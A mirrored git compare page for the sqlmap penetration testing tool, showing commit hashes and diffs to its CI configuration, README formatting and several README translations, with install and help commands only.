mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-06 04:31:30 +00:00
Compare commits
357 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
c4d8cab50c | ||
|
|
577e346774 | ||
|
|
81c6aad129 | ||
|
|
775325556e | ||
|
|
375abd50ee | ||
|
|
e718e2732e | ||
|
|
8c8764368f | ||
|
|
4a815ab56f | ||
|
|
6564adc984 | ||
|
|
ad5b8017f5 | ||
|
|
72e5a79288 | ||
|
|
63f4b3462f | ||
|
|
a45a90df94 | ||
|
|
ec1ac81e0a | ||
|
|
6ba46bf7cf | ||
|
|
a1f85df12b | ||
|
|
9c2c3894d6 | ||
|
|
b92fc840fe | ||
|
|
ef79bbf7d2 | ||
|
|
fba1199cd2 | ||
|
|
4022a68523 | ||
|
|
67bc3ed359 | ||
|
|
a0ddd99087 | ||
|
|
2a7ef58c9f | ||
|
|
35010006a1 | ||
|
|
acfe788c95 | ||
|
|
5ccb73a1ee | ||
|
|
6ac5b6b759 | ||
|
|
d82f20abc4 | ||
|
|
10eafa35fd | ||
|
|
9105f259cd | ||
|
|
7cca56edfa | ||
|
|
e21d751834 | ||
|
|
ebb73b71fa | ||
|
|
1ca633ae64 | ||
|
|
3e22cbfed7 | ||
|
|
c7f615f707 | ||
|
|
b83ee92cd1 | ||
|
|
571d669a09 | ||
|
|
e485531b71 | ||
|
|
7427b554e3 | ||
|
|
1a818ceccd | ||
|
|
7fea8d608e | ||
|
|
1e6191e3b1 | ||
|
|
c10b2825d7 | ||
|
|
c200b2cb19 | ||
|
|
071f4c8a2b | ||
|
|
5097a2c79e | ||
|
|
bce9db1af5 | ||
|
|
ca67456dbe | ||
|
|
6df4d73b09 | ||
|
|
2aaa486f7a | ||
|
|
47ba7d4705 | ||
|
|
6a8bfd5fd8 | ||
|
|
1df94747e1 | ||
|
|
4092c701fe | ||
|
|
4939bd49b0 | ||
|
|
c6fb3d35d8 | ||
|
|
aad0bd8705 | ||
|
|
b69f635a3f | ||
|
|
eeae696b1b | ||
|
|
e1c8bc0e01 | ||
|
|
4b0acee585 | ||
|
|
d74612eb4c | ||
|
|
88c33974ac | ||
|
|
e5d7bfe453 | ||
|
|
99d23237b4 | ||
|
|
08d750197c | ||
|
|
d35bdf6eaa | ||
|
|
d332e00eb0 | ||
|
|
9d5499597f | ||
|
|
c0f8bbbc72 | ||
|
|
1684d60782 | ||
|
|
af6a977c9a | ||
|
|
f20263f235 | ||
|
|
2e42afea6f | ||
|
|
292a28131d | ||
|
|
2e775fbb75 | ||
|
|
e1d7641b8a | ||
|
|
6b0951d1ee | ||
|
|
db1fc621b5 | ||
|
|
9351756c36 | ||
|
|
63b645c64c | ||
|
|
7ad49f4185 | ||
|
|
d9315830f9 | ||
|
|
2e2c62b6a7 | ||
|
|
53289b0234 | ||
|
|
dd082ef79d | ||
|
|
2c968f9a35 | ||
|
|
74d0315fef | ||
|
|
ae98159130 | ||
|
|
3a9e36c52b | ||
|
|
cb43c03712 | ||
|
|
65a0f15f69 | ||
|
|
98b77d32cc | ||
|
|
86a3569ccb | ||
|
|
17fca351d3 | ||
|
|
2614e7bec1 | ||
|
|
832c6e806f | ||
|
|
7b334b0808 | ||
|
|
aa9151785e | ||
|
|
6bdef1b7da | ||
|
|
8b4367d354 | ||
|
|
0a9d69a7d0 | ||
|
|
a4b60dc00f | ||
|
|
f91ae32284 | ||
|
|
53fc9d6720 | ||
|
|
0b31568306 | ||
|
|
e9407cf791 | ||
|
|
0175acd028 | ||
|
|
733a32de32 | ||
|
|
1b863ecf93 | ||
|
|
ec06037335 | ||
|
|
0cdb62a1b5 | ||
|
|
99454198b8 | ||
|
|
dd6287ace8 | ||
|
|
786460e3b4 | ||
|
|
419cf979f1 | ||
|
|
30be875304 | ||
|
|
7d011bc811 | ||
|
|
b2c4a3b247 | ||
|
|
9d9592a69b | ||
|
|
cb42294a7e | ||
|
|
146762c109 | ||
|
|
494b9d1586 | ||
|
|
2e95fdb52d | ||
|
|
46736cac7b | ||
|
|
041213f22d | ||
|
|
8ca45c5678 | ||
|
|
c6eec8db97 | ||
|
|
98fdc493f4 | ||
|
|
91372bff87 | ||
|
|
7fb9db42a7 | ||
|
|
82382957f9 | ||
|
|
f034122bd0 | ||
|
|
0df2456f34 | ||
|
|
78fdb27a0b | ||
|
|
350baf0a0a | ||
|
|
9886b646eb | ||
|
|
c5197b99a0 | ||
|
|
cc313280af | ||
|
|
f06ff42c58 | ||
|
|
4bc1cf4518 | ||
|
|
0e65043c84 | ||
|
|
d7d565415a | ||
|
|
0986ec8948 | ||
|
|
50bced511f | ||
|
|
e275e8c0b0 | ||
|
|
77dea38ac1 | ||
|
|
7dc2ec5fd8 | ||
|
|
4bf2e3b139 | ||
|
|
8114c14755 | ||
|
|
ec8cf6aadc | ||
|
|
d326965966 | ||
|
|
030df0353d | ||
|
|
5038d7a70a | ||
|
|
f0b8fbb7fd | ||
|
|
5810c2b199 | ||
|
|
77f0b5dfa8 | ||
|
|
b0ea74dc63 | ||
|
|
0c07c8942c | ||
|
|
7d1bdb35ca | ||
|
|
e823889819 | ||
|
|
680aedaefc | ||
|
|
afdca09ced | ||
|
|
ac89ee71c3 | ||
|
|
af7c8cff92 | ||
|
|
26d4dec5fb | ||
|
|
cf31d12528 | ||
|
|
b4c730f8c0 | ||
|
|
fba1720b31 | ||
|
|
9fad72f28b | ||
|
|
1782bf8e64 | ||
|
|
2d59a10515 | ||
|
|
21a25c4f00 | ||
|
|
6b5c16c22c | ||
|
|
2c6621c26a | ||
|
|
f0500b1d2f | ||
|
|
6a033bb58c | ||
|
|
2fa4b22645 | ||
|
|
229d3a7dd0 | ||
|
|
b965e5bf1c | ||
|
|
3bd74c5351 | ||
|
|
55624ec1a2 | ||
|
|
6885afe8c3 | ||
|
|
acc1277246 | ||
|
|
935cb9c8cb | ||
|
|
17a4ddad63 | ||
|
|
5264671f5b | ||
|
|
b4ebbae354 | ||
|
|
510197c39e | ||
|
|
b6a4bd91fe | ||
|
|
83b82a5e98 | ||
|
|
0b1efc0759 | ||
|
|
2b506d744d | ||
|
|
79d08906a4 | ||
|
|
d27b33e26c | ||
|
|
73d86f0fdd | ||
|
|
6327063bd0 | ||
|
|
69fd900108 | ||
|
|
f9d01f682b | ||
|
|
d7d3db415b | ||
|
|
608f141f52 | ||
|
|
31850e4544 | ||
|
|
de9f23939f | ||
|
|
154ed2c4e2 | ||
|
|
89dfe4e1ac | ||
|
|
b41b07ddd8 | ||
|
|
e36fc02282 | ||
|
|
49b41c1eca | ||
|
|
4cd9fdb7df | ||
|
|
5aab2d8fb5 | ||
|
|
210b65c02d | ||
|
|
7a2ac23f0b | ||
|
|
e435fb2e9e | ||
|
|
6892c94595 | ||
|
|
831c960216 | ||
|
|
43af2a4aee | ||
|
|
190819e85d | ||
|
|
1de6996c26 | ||
|
|
304f2ed308 | ||
|
|
148b35da4f | ||
|
|
3865b3a398 | ||
|
|
d6bcbbae1d | ||
|
|
04b3aefc5d | ||
|
|
a5f8cae599 | ||
|
|
29c3037512 | ||
|
|
d0d7d3a205 | ||
|
|
7ce36ea1b6 | ||
|
|
6f97f4796b | ||
|
|
39fe96009f | ||
|
|
b475a38895 | ||
|
|
42de887b05 | ||
|
|
28576bf08e | ||
|
|
c395958dff | ||
|
|
798b539eec | ||
|
|
70cf8edc75 | ||
|
|
a81ea88eb0 | ||
|
|
023dda26fc | ||
|
|
3e76895155 | ||
|
|
2c1bd7f034 | ||
|
|
f7cae68378 | ||
|
|
f6ff1a115a | ||
|
|
32ee586e2a | ||
|
|
b9e5655e3c | ||
|
|
6623c3f877 | ||
|
|
30a4173249 | ||
|
|
dbbe4c6ddd | ||
|
|
633e4dfe48 | ||
|
|
5e8b105677 | ||
|
|
414dd96bbd | ||
|
|
e857c2a88a | ||
|
|
e7aaea2b8e | ||
|
|
63d7cd607e | ||
|
|
d886b08dd9 | ||
|
|
72f3185ae7 | ||
|
|
03be9f9b65 | ||
|
|
d9d0865c13 | ||
|
|
e3f54bc226 | ||
|
|
9662f4a56a | ||
|
|
fea5cc8579 | ||
|
|
94091cd0e9 | ||
|
|
cc9f4b6102 | ||
|
|
cd7c99c752 | ||
|
|
75478c1181 | ||
|
|
ad0ca69579 | ||
|
|
2d801b7122 | ||
|
|
1e07269fe3 | ||
|
|
3b74e99576 | ||
|
|
439fff684e | ||
|
|
72cf06119c | ||
|
|
808068d70a | ||
|
|
f09072b2b6 | ||
|
|
be9381abc5 | ||
|
|
5d09f7b85f | ||
|
|
8bbfee7591 | ||
|
|
be26392057 | ||
|
|
263730f4ee | ||
|
|
5d7e1782d9 | ||
|
|
e27f590c2c | ||
|
|
7afe655561 | ||
|
|
3bf08290a4 | ||
|
|
34c2172391 | ||
|
|
48044f7a46 | ||
|
|
04e666182f | ||
|
|
c797129956 | ||
|
|
6928dae956 | ||
|
|
6db3bcbb51 | ||
|
|
d7f0b3566d | ||
|
|
0c67a90cc0 | ||
|
|
f06e498fb0 | ||
|
|
ad612bf9e4 | ||
|
|
9dd5cd8eb6 | ||
|
|
5ed3cdc819 | ||
|
|
e07c92bce5 | ||
|
|
0c5965c7b8 | ||
|
|
aa21550712 | ||
|
|
66061e8c5f | ||
|
|
c4b74c2e01 | ||
|
|
55b23e78ee | ||
|
|
a9526bda92 | ||
|
|
0901da3f83 | ||
|
|
8004652f7b | ||
|
|
c9b410c97f | ||
|
|
814d710320 | ||
|
|
38fcc5a35a | ||
|
|
674d516f3e | ||
|
|
8ceb4907a5 | ||
|
|
ce3749622a | ||
|
|
bcfae99701 | ||
|
|
44c1c2c6f0 | ||
|
|
ac08db82b2 | ||
|
|
305bfd9d30 | ||
|
|
f9aaec7b4a | ||
|
|
d881a92ee7 | ||
|
|
60ada89347 | ||
|
|
171bfa33a7 | ||
|
|
acaef90c7b | ||
|
|
31d7021d4c | ||
|
|
e83d8f6143 | ||
|
|
0245ce6228 | ||
|
|
7e55af2811 | ||
|
|
ad3b766b65 | ||
|
|
074fbbcea5 | ||
|
|
5b0d5970cc | ||
|
|
6c2f9859be | ||
|
|
d496d99943 | ||
|
|
d20e9febf2 | ||
|
|
d76ee8f534 | ||
|
|
5b88e3e1ad | ||
|
|
a68848faf7 | ||
|
|
a4f21399e7 | ||
|
|
e03b2df58f | ||
|
|
252eb97198 | ||
|
|
67ae620182 | ||
|
|
13366aeb48 | ||
|
|
e1ce16144a | ||
|
|
3307918389 | ||
|
|
c50849707f | ||
|
|
06296bd251 | ||
|
|
0f6e529fb9 | ||
|
|
242800c085 | ||
|
|
da5fff7775 | ||
|
|
679f0cf772 | ||
|
|
8df56ecc72 | ||
|
|
1b5a4651a9 | ||
|
|
05fa7eb7c6 | ||
|
|
336169e181 | ||
|
|
b2bc3d49fd | ||
|
|
71aa7deefe | ||
|
|
cf5ae507c8 | ||
|
|
4898a2c332 | ||
|
|
151dcee32e | ||
|
|
73f1155847 | ||
|
|
fcf9998010 | ||
|
|
26b895dd2e | ||
|
|
b4bb4c393b |
3
.gitattributes
vendored
3
.gitattributes
vendored
@@ -1,5 +1,6 @@
|
||||
*.py text eol=lf
|
||||
*.conf text eol=lf
|
||||
*.md5 text eol=lf
|
||||
*.py text eol=lf
|
||||
|
||||
*_ binary
|
||||
*.dll binary
|
||||
|
||||
6
.travis.yml
Normal file
6
.travis.yml
Normal file
@@ -0,0 +1,6 @@
|
||||
language: python
|
||||
python:
|
||||
- "2.6"
|
||||
- "2.7"
|
||||
script:
|
||||
- python -c "import sqlmap; import sqlmapapi"
|
||||
@@ -1,6 +1,6 @@
|
||||
sqlmap
|
||||
==
|
||||
# sqlmap
|
||||
|
||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
|
||||
|
||||
@@ -33,7 +33,7 @@ To get a list of all options and switches use:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
You can find a sample run [here](https://gist.github.com/stamparm/5335217).
|
||||
You can find a sample run [here](https://asciinema.org/a/46601).
|
||||
To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||
|
||||
Links
|
||||
@@ -57,8 +57,11 @@ Translations
|
||||
|
||||
* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
|
||||
* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
|
||||
* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
|
||||
* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
|
||||
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
|
||||
* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
|
||||
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
|
||||
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
|
||||
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
|
||||
* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
|
||||
|
||||
@@ -12,7 +12,7 @@ This file lists bundled packages and their associated licensing terms.
|
||||
Copyright (C) 2005, Zope Corporation.
|
||||
Copyright (C) 1998-2000, Gisle Aas.
|
||||
* The Colorama library located under thirdparty/colorama/.
|
||||
Copyright (C) 2010, Jonathan Hartley.
|
||||
Copyright (C) 2013, Jonathan Hartley.
|
||||
* The Fcrypt library located under thirdparty/fcrypt/.
|
||||
Copyright (C) 2000, 2001, 2004 Carey Evans.
|
||||
* The Odict library located under thirdparty/odict/.
|
||||
|
||||
@@ -1,5 +1,6 @@
|
||||
sqlmap
|
||||
==
|
||||
# sqlmap
|
||||
|
||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band".
|
||||
|
||||
@@ -31,7 +32,7 @@ Para obtener una lista de todas las opciones:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Se puede encontrar una muestra de su funcionamiento [aquí](https://gist.github.com/stamparm/5335217).
|
||||
Se puede encontrar una muestra de su funcionamiento [aquí](https://asciinema.org/a/46601).
|
||||
Para obtener una visión general de las capacidades de sqlmap, así como un listado funciones soportadas y descripción de todas las opciones y modificadores, junto con ejemplos, se recomienda consultar el [manual de usuario](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||
|
||||
Enlaces
|
||||
|
||||
52
doc/translations/README-fr-FR.md
Normal file
52
doc/translations/README-fr-FR.md
Normal file
@@ -0,0 +1,52 @@
|
||||
# sqlmap
|
||||
|
||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||
|
||||
**sqlmap** est un outil Open Source de test d'intrusion. Cet outil permet d'automatiser le processus de détection et d'exploitation des failles d'injection SQL afin de prendre le contrôle des serveurs de base de données. __sqlmap__ dispose d'un puissant moteur de détection utilisant les techniques les plus récentes et les plus dévastatrices de tests d'intrusion comme L'Injection SQL, qui permet d'accéder à la base de données, au système de fichiers sous-jacent et permet aussi l'exécution des commandes sur le système d'exploitation.
|
||||
|
||||
----
|
||||
|
||||

|
||||
|
||||
Les captures d'écran disponible [ici](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) démontrent des fonctionnalités de __sqlmap__.
|
||||
|
||||
Installation
|
||||
----
|
||||
|
||||
Vous pouvez télécharger le plus récent fichier tarball en cliquant [ici](https://github.com/sqlmapproject/sqlmap/tarball/master). Vous pouvez aussi télécharger le plus récent archive zip [ici](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||
|
||||
De préférence, télécharger __sqlmap__ en le [clonant](https://github.com/sqlmapproject/sqlmap):
|
||||
|
||||
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6.x** et **2.7.x** de [Python](http://www.python.org/download/)
|
||||
|
||||
Usage
|
||||
----
|
||||
|
||||
Pour afficher une liste des fonctions de bases et des commutateurs (switches), tapez:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
Pour afficher une liste complète des options et des commutateurs (switches), tapez:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Vous pouvez regarder un vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples.
|
||||
Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge et la description de toutes les options, ainsi que des exemples , nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||
|
||||
Liens
|
||||
----
|
||||
|
||||
* Page d'acceuil: http://sqlmap.org
|
||||
* Téléchargement: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* Manuel de l'utilisateur: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* Foire aux questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||
* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* Démonstrations: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||
* Les captures d'écran: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
@@ -1,6 +1,6 @@
|
||||
sqlmap
|
||||
==
|
||||
# sqlmap
|
||||
|
||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||
|
||||
Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.
|
||||
|
||||
@@ -33,7 +33,7 @@ sqlmap
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Μπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://gist.github.com/stamparm/5335217).
|
||||
Μπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://asciinema.org/a/46601).
|
||||
Για μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||
|
||||
Σύνδεσμοι
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
sqlmap
|
||||
==
|
||||
# sqlmap
|
||||
|
||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza.
|
||||
|
||||
@@ -33,7 +33,7 @@ Kako biste dobili listu svih opcija i prekidača koristite:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Možete pronaći primjer izvršavanja [ovdje](https://gist.github.com/stamparm/5335217).
|
||||
Možete pronaći primjer izvršavanja [ovdje](https://asciinema.org/a/46601).
|
||||
Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||
|
||||
Poveznice
|
||||
|
||||
@@ -1,5 +1,6 @@
|
||||
sqlmap
|
||||
==
|
||||
# sqlmap
|
||||
|
||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basisdata. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur hanal bagi _penetration tester_, beragam cara untuk mendeteksi basisdata, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
|
||||
|
||||
@@ -33,7 +34,7 @@ Untuk mendapatkan daftar opsi lanjut gunakan:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Anda dapat mendapatkan contoh penggunaan [di sini](https://gist.github.com/stamparm/5335217).
|
||||
Anda dapat mendapatkan contoh penggunaan [di sini](https://asciinema.org/a/46601).
|
||||
Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [manual pengguna](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||
|
||||
Tautan
|
||||
|
||||
53
doc/translations/README-it-IT.md
Normal file
53
doc/translations/README-it-IT.md
Normal file
@@ -0,0 +1,53 @@
|
||||
# sqlmap
|
||||
|
||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap è uno strumento open source per il penetration testing. Il suo scopo è quello di rendere automatico il processo di scoperta ed exploit di vulnerabilità di tipo SQL injection al fine di compromettere database online. Dispone di un potente motore per la ricerca di vulnerabilità, molti strumenti di nicchia anche per il più esperto penetration tester ed un'ampia gamma di controlli che vanno dal fingerprinting di database allo scaricamento di dati, fino all'accesso al file system sottostante e l'esecuzione di comandi nel sistema operativo attraverso connessioni out-of-band.
|
||||
|
||||
Screenshot
|
||||
----
|
||||
|
||||

|
||||
|
||||
Nella wiki puoi visitare [l'elenco di screenshot](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) che mostrano il funzionamento di alcune delle funzionalità del programma.
|
||||
|
||||
Installazione
|
||||
----
|
||||
|
||||
Puoi scaricare l'ultima tarball cliccando [qui](https://github.com/sqlmapproject/sqlmap/tarball/master) oppure l'ultima zipball cliccando [qui](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||
|
||||
La cosa migliore sarebbe però scaricare sqlmap clonando la repository [Git](https://github.com/sqlmapproject/sqlmap):
|
||||
|
||||
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmap è in grado di funzionare con le versioni **2.6.x** e **2.7.x** di [Python](http://www.python.org/download/) su ogni piattaforma.
|
||||
|
||||
Utilizzo
|
||||
----
|
||||
|
||||
Per una lista delle opzioni e dei controlli di base:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
Per una lista di tutte le opzioni e di tutti i controlli:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Puoi trovare un esempio di esecuzione [qui](https://asciinema.org/a/46601).
|
||||
Per una panoramica delle capacità di sqlmap, una lista delle sue funzionalità e la descrizione di tutte le sue opzioni e controlli, insieme ad un gran numero di esempi, siete pregati di visitare lo [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) (disponibile solo in inglese).
|
||||
|
||||
Link
|
||||
----
|
||||
|
||||
* Sito: http://sqlmap.org
|
||||
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* RSS feed dei commit: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* Manuale dell'utente: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* Domande più frequenti (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* Iscrizione alla Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||
* Archivio della Mailing list: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* Dimostrazioni: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||
* Screenshot: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
54
doc/translations/README-ja-JP.md
Normal file
54
doc/translations/README-ja-JP.md
Normal file
@@ -0,0 +1,54 @@
|
||||
# sqlmap
|
||||
|
||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmapはオープンソースのペネトレーションテスティングツールです。SQLインジェクションの脆弱性の検出、活用、そしてデータベースサーバ奪取のプロセスを自動化します。
|
||||
強力な検出エンジン、ペネトレーションテスターのための多くのニッチ機能、持続的なデータベースのフィンガープリンティングから、データベースのデータ取得やアウトオブバンド接続を介したオペレーティング・システム上でのコマンド実行、ファイルシステムへのアクセスなどの広範囲に及ぶスイッチを提供します。
|
||||
|
||||
スクリーンショット
|
||||
----
|
||||
|
||||

|
||||
|
||||
wikiに載っているいくつかの機能のデモをスクリーンショットで見ることができます。 [スクリーンショット集](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots)
|
||||
|
||||
インストール
|
||||
----
|
||||
|
||||
最新のtarballを [こちら](https://github.com/sqlmapproject/sqlmap/tarball/master) から、最新のzipballを [こちら](https://github.com/sqlmapproject/sqlmap/zipball/master) からダウンロードできます。
|
||||
|
||||
[Git](https://github.com/sqlmapproject/sqlmap) レポジトリをクローンして、sqlmapをダウンロードすることも可能です。:
|
||||
|
||||
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmapは、 [Python](http://www.python.org/download/) バージョン **2.6.x** または **2.7.x** がインストールされていれば、全てのプラットフォームですぐに使用できます。
|
||||
|
||||
使用法
|
||||
----
|
||||
|
||||
基本的なオプションとスイッチの使用法をリストするには:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
全てのオプションとスイッチの使用法をリストするには:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
実行例を [こちら](https://asciinema.org/a/46601) で見ることができます。
|
||||
sqlmapの概要、機能の一覧、全てのオプションやスイッチの使用法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki) で確認することができます。
|
||||
|
||||
リンク
|
||||
----
|
||||
|
||||
* ホームページ: http://sqlmap.org
|
||||
* ダウンロード: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* コミットのRSSフィード: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* 課題管理: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* ユーザーマニュアル: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* よくある質問 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* メーリングリストへの参加: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||
* メーリングリストのRSSフィード: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||
